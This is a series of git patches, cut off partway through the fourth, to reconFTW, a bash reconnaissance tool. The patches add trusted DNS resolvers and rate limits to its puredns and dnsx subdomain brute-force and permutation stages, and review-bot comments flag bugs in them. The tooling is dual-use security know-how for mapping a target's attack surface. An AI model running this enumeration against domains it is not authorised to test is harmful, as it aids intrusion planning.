From 2116a699f22d095b35a2da26edd867d3806f24dd Mon Sep 17 00:00:00 2001 From: six2dez Date: Mon, 12 Apr 2021 13:54:18 +0200 Subject: [PATCH 01/19] Puredns trusted enhancement --- install.sh | 2 ++ reconftw.cfg | 1 + reconftw.sh | 35 ++++++++++++++++++----------------- 3 files changed, 21 insertions(+), 17 deletions(-) diff --git a/install.sh b/install.sh index d4ccfbe5..58e5c3ec 100755 --- a/install.sh +++ b/install.sh @@ -255,6 +255,8 @@ if [ ! -s "resolvers.txt" ] || [ $(find "resolvers.txt" -mtime +1 -print) ]; the fi eval h8mail -g $DEBUG_STD +echo -e "8.8.8.8\n8.8.4.4" > $dir/puredns/trusted.txt + ## Stripping all Go binaries eval strip -s $HOME/go/bin/* $DEBUG_STD diff --git a/reconftw.cfg b/reconftw.cfg index d8226145..b2c5c274 100644 --- a/reconftw.cfg +++ b/reconftw.cfg @@ -121,6 +121,7 @@ BRUTESPRAY_CONCURRENCE=10 ARJUN_THREADS=20 GAUPLUS_THREADS=10 DALFOX_THREADS=200 +PUREDNS_TRUSTED_LIMIT=400 # lists fuzz_wordlist=${tools}/fuzz_wordlist.txt diff --git a/reconftw.sh b/reconftw.sh index 20b5796f..a37d1e3d 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -375,7 +375,7 @@ function sub_active(){ fi cat .tmp/*_subs.txt | anew -q .tmp/subs_no_resolved.txt deleteOutScoped $outOfScope_file .tmp/subs_no_resolved.txt - eval $tools/puredns/puredns resolve .tmp/subs_no_resolved.txt -w .tmp/subdomains_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/subs_no_resolved.txt -w .tmp/subdomains_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD echo $domain | dnsx -silent | anew -q .tmp/subdomains_tmp.txt NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (active resolution)" ${FUNCNAME[0]} 
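Review bot: The added `echo -e "8.8.8.8\n8.8.4.4" > $dir/puredns/trusted.txt` leaves `$dir` unquoted and depends on `echo -e`, whose escape handling differs between shells; `printf '%s\n' 8.8.8.8 8.8.4.4 > "$dir/puredns/trusted.txt"` writes the same two lines without either issue. Nothing in the hunk creates `$dir/puredns/`, so the redirect only works if an earlier install step has already cloned puredns there — presumably true, but worth confirming. A short comment such as `# resolvers puredns may use as its trusted set; edit to taste` would tell the next maintainer why these two addresses are hard-coded.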
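Review bot: `PUREDNS_TRUSTED_LIMIT=400` is added without any comment on its unit, while the neighbouring keys are all self-describing thread counts; a reader cannot tell whether 400 is threads, a rate or a count. Add `# value passed to puredns -lt for the trusted resolvers (rate limit; confirm unit against puredns --help)`. Because reconftw.sh now reads this key unconditionally, a reconftw.cfg that predates this line leaves it empty, so a script-side default (`${PUREDNS_TRUSTED_LIMIT:-400}`) is worth adding alongside the key.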
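Review bot: The new `-lt $PUREDNS_TRUSTED_LIMIT` on the puredns line has no fallback: for a user whose reconftw.cfg predates this key the expansion is empty, `-lt` reaches puredns with no value (the following `$DEBUG_STD` word is presumably a redirection once eval re-parses the line), and the stage reports zero subdomains while the error text is discarded. Use `-lt ${PUREDNS_TRUSTED_LIMIT:-400}` here, or assert the key once where the config is loaded with `: "${PUREDNS_TRUSTED_LIMIT:?set it in reconftw.cfg}"`. The same applies to the identical edits in sub_dns, sub_brute, sub_scraping, sub_permut and sub_recursive. sub_active starts outside the hunk.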
@@ -390,7 +390,7 @@ function sub_dns(){ start_subfunc "Running : DNS Subdomain Enumeration" eval dnsx -retry 3 -silent -cname -resp -l subdomains/subdomains.txt -o subdomains/subdomains_cname.txt $DEBUG_STD cat subdomains/subdomains_cname.txt | cut -d '[' -f2 | sed 's/.$//' | grep ".$domain$" | anew -q .tmp/subdomains_dns.txt - eval $tools/puredns/puredns resolve .tmp/subdomains_dns.txt -w .tmp/subdomains_dns_resolved.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/subdomains_dns.txt -w .tmp/subdomains_dns_resolved.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD NUMOFLINES=$(eval cat .tmp/subdomains_dns_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (dns resolution)" ${FUNCNAME[0]} else @@ -403,9 +403,9 @@ function sub_brute(){ then start_subfunc "Running : Bruteforce Subdomain Enumeration" if [ "$DEEP" = true ] ; then - eval $tools/puredns/puredns bruteforce $subs_wordlist_big $domain -w .tmp/subs_brute.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns bruteforce $subs_wordlist_big $domain -w .tmp/subs_brute.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD else - eval $tools/puredns/puredns bruteforce $subs_wordlist $domain -w .tmp/subs_brute.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns bruteforce $subs_wordlist $domain -w .tmp/subs_brute.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD fi NUMOFLINES=$(eval cat .tmp/subs_brute.txt $DEBUG_ERROR | sed "s/*.//" | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (bruteforce)" ${FUNCNAME[0]} 
@@ -433,7 +433,7 @@ function sub_scraping(){ fi sed -i '/^.\{2048\}./d' .tmp/gospider.txt cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | unfurl --unique domains | grep ".$domain$" | anew -q .tmp/scrap_subs.txt - eval $tools/puredns/puredns resolve .tmp/scrap_subs.txt -w .tmp/scrap_subs_resolved.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/scrap_subs.txt -w .tmp/scrap_subs_resolved.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD NUMOFLINES=$(eval cat .tmp/scrap_subs_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | tee .tmp/diff_scrap.txt | wc -l) cat .tmp/diff_scrap.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt end_subfunc "${NUMOFLINES} new subs (code scraping)" ${FUNCNAME[0]} 
@@ -452,41 +452,41 @@ function sub_permut(){ start_subfunc "Running : Permutations Subdomain Enumeration" if [ "$DEEP" = true ] ; then eval DNScewl --tL subdomains/subdomains.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt eval DNScewl --tL .tmp/permute1.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl2.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt else if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 100 ]] then eval DNScewl --tL .tmp/subs_no_resolved.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt eval DNScewl --tL .tmp/permute1.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl2.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers $DEBUG_STD + 
eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt elif [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 200 ]] then eval DNScewl --tL .tmp/subs_no_resolved.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt else if [[ $(cat subdomains/subdomains.txt | wc -l) -le 100 ]] then eval DNScewl --tL subdomains/subdomains.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt eval DNScewl --tL .tmp/permute1.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl2.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt elif [[ $(cat subdomains/subdomains.txt | wc 
-l) -le 200 ]] then eval DNScewl --tL subdomains/subdomains.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt else printf "\n${bred} Skipping Permutations: Too Much Subdomains${reset}\n\n" 
@@ -571,17 +571,18 @@ function sub_recursive(){ if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 1000 ]] then start_subfunc "Running : Subdomains recursive search" + echo "" > .tmp/brute_recursive_wordlist.txt for sub in $(cat subdomains/subdomains.txt); do - sed "s/$/.$sub/" $subs_wordlist | anew -q .tmp/brute_recursive_wordlist.txt + sed "s/$/.$sub/" $subs_wordlist >> .tmp/brute_recursive_wordlist.txt done - eval $tools/puredns/puredns resolve .tmp/brute_recursive_wordlist.txt -r $resolvers -w .tmp/brute_recursive_result.txt $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/brute_recursive_wordlist.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT -w .tmp/brute_recursive_result.txt $DEBUG_STD cat .tmp/brute_recursive_result.txt | anew -q .tmp/brute_recursive.txt eval DNScewl --tL .tmp/brute_recursive.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1_recursive.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1_recursive.txt -w .tmp/permute1_recursive_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1_recursive.txt -w .tmp/permute1_recursive_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1_recursive.txt eval DNScewl --tL .tmp/permute1_recursive.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl2_recursive.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl2_recursive.txt -w .tmp/permute2_recursive_tmp.txt -r $resolvers $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl2_recursive.txt -w .tmp/permute2_recursive_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_recursive.txt .tmp/permute2_recursive_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_recursive.txt NUMOFLINES=$(eval cat .tmp/permute_recursive.txt .tmp/brute_recursive.txt $DEBUG_ERROR | anew 
subdomains/subdomains.txt | wc -l) From b5ee00a626523955f5e4de48b755fe647c8429b4 Mon Sep 17 00:00:00 2001 From: six2dez Date: Mon, 12 Apr 2021 14:29:35 +0200 Subject: [PATCH 02/19] Better notification output --- reconftw.sh | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/reconftw.sh b/reconftw.sh index a37d1e3d..c62c3cb0 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -1362,20 +1362,20 @@ function notification(){ then case $2 in info) - text="\n${bblue} ${1} ${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY + text="\n${bblue} ${1} ${reset}" + printf "${text}\n" && printf "${text} - ${domain}\n" | $NOTIFY ;; warn) - text="\n${yellow} ${1} ${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY + text="\n${yellow} ${1} ${reset}" + printf "${text}\n" && printf "${text} - ${domain}\n" | $NOTIFY ;; error) - text="\n${bred} ${1} ${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY + text="\n${bred} ${1} ${reset}" + printf "${text}\n" && printf "${text} - ${domain}\n" | $NOTIFY ;; good) - text="\n${bgreen} ${1} ${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY + text="\n${bgreen} ${1} ${reset}" + printf "${text}\n" && printf "${text} - ${domain}\n" | $NOTIFY ;; esac fi From 52d8516c9fe015e824e9ac7f8706d6c334d81973 Mon Sep 17 00:00:00 2001 From: MikeeI Date: Thu, 15 Apr 2021 16:59:11 +0200 Subject: [PATCH 03/19] Typo in README.md reconftw.cfg --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 3ab144bf..bb92cd0a 100644 --- a/README.md +++ b/README.md @@ -90,7 +90,7 @@ reconFTW is a tool designed to perform automated recon on a target domain by run # Config file -- Through ```reconftw.config``` file the whole execution of the tool can be controlled. +- Through ```reconftw.cfg``` file the whole execution of the tool can be controlled. - Hunters can set various scanning modes, execution preferences, tools config files, APIs/TOKENS, personalized wordlists
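Review bot: `echo "" > .tmp/brute_recursive_wordlist.txt` does not merely reset the file, it writes one empty line into it, so the wordlist handed to puredns now begins with a blank entry; `: > .tmp/brute_recursive_wordlist.txt` truncates without that. The switch from `anew -q` to `>>` also drops the de-duplication the old line performed, so overlapping entries in subdomains/subdomains.txt produce the same candidate more than once — acceptable if intended, but a comment such as `# appended raw on purpose: anew per-line is slower than resolving a few duplicates` would record that. sub_recursive starts and ends outside the hunk.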
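Review bot: The rewritten `printf "${text}\n"` and `printf "${text} - ${domain}\n" | $NOTIFY` still use the caller's message `$1` (and now `$domain`) as the printf format string, so any `%` in a message or name is interpreted as a conversion and the output is mangled or printf errors out. Keep the escape handling but move the data out of the format, in all four arms: `printf '%b\n' "${text}" && printf '%b - %s\n' "${text}" "${domain}" | $NOTIFY`. The `case $2 in` has no `*)` arm, so a mistyped level prints nothing and fails silently — exactly what the `warning` vs `warn` call fixed later in this series hit; a `*) printf '%s\n' "$1" ;;` default would have surfaced it. notification's body starts and ends outside the hunk.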
From 8b54f82d1e13509e7cf0b0f3aa00b2c30b53bf55 Mon Sep 17 00:00:00 2001 From: six2dez Date: Fri, 16 Apr 2021 17:07:02 +0200 Subject: [PATCH 04/19] Trusted resolvers, added resolvers to dnsx && nuclei --- install.sh | 4 +- reconftw.cfg | 1 + reconftw.sh | 128 +++++++++++++++++++++++++-------------------------- 3 files changed, 66 insertions(+), 67 deletions(-) diff --git a/install.sh b/install.sh index 58e5c3ec..de51ed50 100755 --- a/install.sh +++ b/install.sh @@ -43,7 +43,6 @@ repos["Gf-Patterns"]="1ndianl33t/Gf-Patterns" repos["github-search"]="gwen001/github-search" repos["ctfr"]="UnaPibaGeek/ctfr" repos["LinkFinder"]="dark-warlord14/LinkFinder" -repos["dnsgen"]="ProjectAnte/dnsgen" repos["ParamSpider"]="devanshbatham/ParamSpider" repos["Corsy"]="s0md3v/Corsy" repos["CMSeeK"]="Tuhinshubhra/CMSeeK" @@ -241,6 +240,7 @@ eval wget -nc -O ~/.gf/potential.json https://raw.githubusercontent.com/devanshb eval wget -nc -O ~/.config/notify/notify.conf https://gist.githubusercontent.com/six2dez/23a996bca189a11e88251367e6583053/raw/a66c4d8cf47a3bc95f5e9ba84773428662ea760c/notify_sample.conf $DEBUG_ERROR eval wget -N -c https://raw.githubusercontent.com/m4ll0k/Bug-Bounty-Toolz/master/getjswords.py $DEBUG_STD eval wget -N -c https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt $DEBUG_STD && mv best-dns-wordlist.txt subdomains_big.txt +eval wget -N -c -O trusted_resolvers.txt https://gist.githubusercontent.com/six2dez/ae9ed7e5c786461868abd3f2344401b6/raw eval wget -N -c -O subdomains.txt https://gist.github.com/six2dez/a307a04a222fab5a57466c51e1569acf/raw $DEBUG_STD eval wget -N -c -O permutations_list.txt https://gist.github.com/six2dez/ffc2b14d283e8f8eff6ac83e20a3c4b4/raw $DEBUG_STD eval wget -N -c -O asyncio_ssrf.py https://gist.github.com/h4ms1k/adcc340495d418fcd72ec727a116fea2/raw $DEBUG_STD && cp asyncio_ssrf.py ssrf.py 
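Review bot: The added download saves to `trusted_resolvers.txt`, but the reconftw.cfg hunk in this same commit points `resolvers_trusted` at `${tools}/resolvers_trusted.txt`, so every new `-rt $resolvers_trusted` / `-r $resolvers_trusted` in reconftw.sh names a file the installer never creates. Use one spelling in both places, e.g. `eval wget -N -c -O resolvers_trusted.txt https://gist.githubusercontent.com/six2dez/ae9ed7e5c786461868abd3f2344401b6/raw $DEBUG_STD`, which also restores the `$DEBUG_STD` that every neighbouring wget line carries. This list decides which resolvers the whole pipeline treats as trusted, yet the URL is the gist's moving `/raw` tip rather than a fixed revision like the notify.conf line a few lines above uses; pinning the revision (or vendoring the file in the repo) keeps the trusted set from changing underneath a release.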
@@ -255,8 +255,6 @@ if [ ! -s "resolvers.txt" ] || [ $(find "resolvers.txt" -mtime +1 -print) ]; the fi eval h8mail -g $DEBUG_STD -echo -e "8.8.8.8\n8.8.4.4" > $dir/puredns/trusted.txt - ## Stripping all Go binaries eval strip -s $HOME/go/bin/* $DEBUG_STD diff --git a/reconftw.cfg b/reconftw.cfg index b2c5c274..c001d1d3 100644 --- a/reconftw.cfg +++ b/reconftw.cfg @@ -129,3 +129,4 @@ lfi_wordlist=${tools}/lfi_wordlist.txt subs_wordlist=${tools}/subdomains.txt subs_wordlist_big=${tools}/subdomains_big.txt resolvers=${tools}/resolvers.txt +resolvers_trusted=${tools}/resolvers_trusted.txt \ No newline at end of file diff --git a/reconftw.sh b/reconftw.sh index c62c3cb0..fd5710c2 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -375,8 +375,8 @@ function sub_active(){ fi cat .tmp/*_subs.txt | anew -q .tmp/subs_no_resolved.txt deleteOutScoped $outOfScope_file .tmp/subs_no_resolved.txt - eval $tools/puredns/puredns resolve .tmp/subs_no_resolved.txt -w .tmp/subdomains_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD - echo $domain | dnsx -silent | anew -q .tmp/subdomains_tmp.txt + eval $tools/puredns/puredns resolve .tmp/subs_no_resolved.txt -w .tmp/subdomains_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + echo $domain | eval dnsx -silent -r $resolvers_trusted $DEBUG_ERROR | anew -q .tmp/subdomains_tmp.txt NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (active resolution)" ${FUNCNAME[0]} else 
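Review bot: The new `-rt $resolvers_trusted` (and `dnsx -r $resolvers_trusted`) assume the file exists, but nothing checks it; with `$DEBUG_STD` presumably redirecting stderr, a missing or empty file makes puredns fail quietly and the stage reports zero new subdomains instead of an error. A guard at the top of the function, `[[ -s "$resolvers_trusted" ]] || { printf '%s\n' "resolvers_trusted missing: $resolvers_trusted" >&2; return 1; }`, or a single check where reconftw.cfg is loaded, turns that into a visible failure. Please also confirm that the pinned puredns accepts the `-rt`/`-lt` shorthands rather than only `--resolvers-trusted`/`--rate-limit-trusted`; a rejected flag fails in the same silent way. The same applies to the identical edits in sub_dns, sub_brute, sub_scraping, sub_permut, sub_recursive, subtakeover, nuclei_check and jschecks. sub_active starts outside the hunk.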
@@ -388,9 +388,9 @@ function sub_dns(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] then start_subfunc "Running : DNS Subdomain Enumeration" - eval dnsx -retry 3 -silent -cname -resp -l subdomains/subdomains.txt -o subdomains/subdomains_cname.txt $DEBUG_STD + eval dnsx -retry 3 -silent -cname -resp -l subdomains/subdomains.txt -o subdomains/subdomains_cname.txt -r $resolvers_trusted $DEBUG_STD cat subdomains/subdomains_cname.txt | cut -d '[' -f2 | sed 's/.$//' | grep ".$domain$" | anew -q .tmp/subdomains_dns.txt - eval $tools/puredns/puredns resolve .tmp/subdomains_dns.txt -w .tmp/subdomains_dns_resolved.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/subdomains_dns.txt -w .tmp/subdomains_dns_resolved.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD NUMOFLINES=$(eval cat .tmp/subdomains_dns_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (dns resolution)" ${FUNCNAME[0]} else @@ -403,9 +403,9 @@ function sub_brute(){ then start_subfunc "Running : Bruteforce Subdomain Enumeration" if [ "$DEEP" = true ] ; then - eval $tools/puredns/puredns bruteforce $subs_wordlist_big $domain -w .tmp/subs_brute.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns bruteforce $subs_wordlist_big $domain -w .tmp/subs_brute.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD else - eval $tools/puredns/puredns bruteforce $subs_wordlist $domain -w .tmp/subs_brute.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns bruteforce $subs_wordlist $domain -w .tmp/subs_brute.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD fi NUMOFLINES=$(eval cat .tmp/subs_brute.txt $DEBUG_ERROR | sed "s/*.//" | anew subdomains/subdomains.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (bruteforce)" ${FUNCNAME[0]} 
@@ -433,7 +433,7 @@ function sub_scraping(){ fi sed -i '/^.\{2048\}./d' .tmp/gospider.txt cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | unfurl --unique domains | grep ".$domain$" | anew -q .tmp/scrap_subs.txt - eval $tools/puredns/puredns resolve .tmp/scrap_subs.txt -w .tmp/scrap_subs_resolved.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/scrap_subs.txt -w .tmp/scrap_subs_resolved.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD NUMOFLINES=$(eval cat .tmp/scrap_subs_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | tee .tmp/diff_scrap.txt | wc -l) cat .tmp/diff_scrap.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp_scrap.txt end_subfunc "${NUMOFLINES} new subs (code scraping)" ${FUNCNAME[0]} 
@@ -452,41 +452,41 @@ function sub_permut(){ start_subfunc "Running : Permutations Subdomain Enumeration" if [ "$DEEP" = true ] ; then eval DNScewl --tL subdomains/subdomains.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt eval DNScewl --tL .tmp/permute1.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl2.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt else if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 100 ]] then eval DNScewl --tL .tmp/subs_no_resolved.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute1_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute1_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute1.txt eval DNScewl --tL .tmp/permute1.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n 
+14 | grep ".$domain$" > .tmp/DNScewl2.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl2.txt -w .tmp/permute2_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute2_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute2.txt eval cat .tmp/permute1.txt .tmp/permute2.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt elif [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 200 ]] then eval DNScewl --tL .tmp/subs_no_resolved.txt -p $tools/permutations_list.txt --level=0 --subs --no-color $DEBUG_ERROR | tail -n +14 | grep ".$domain$" > .tmp/DNScewl1.txt - eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD + eval $tools/puredns/puredns resolve .tmp/DNScewl1.txt -w .tmp/permute_tmp.txt -r $resolvers -rt $resolvers_trusted -lt $PUREDNS_TRUSTED_LIMIT $DEBUG_STD eval cat .tmp/permute_tmp.txt $DEBUG_ERROR | anew -q .tmp/permute_subs.txt else if [[ $(cat subdomains/subdomains.txt | wc -l) -le 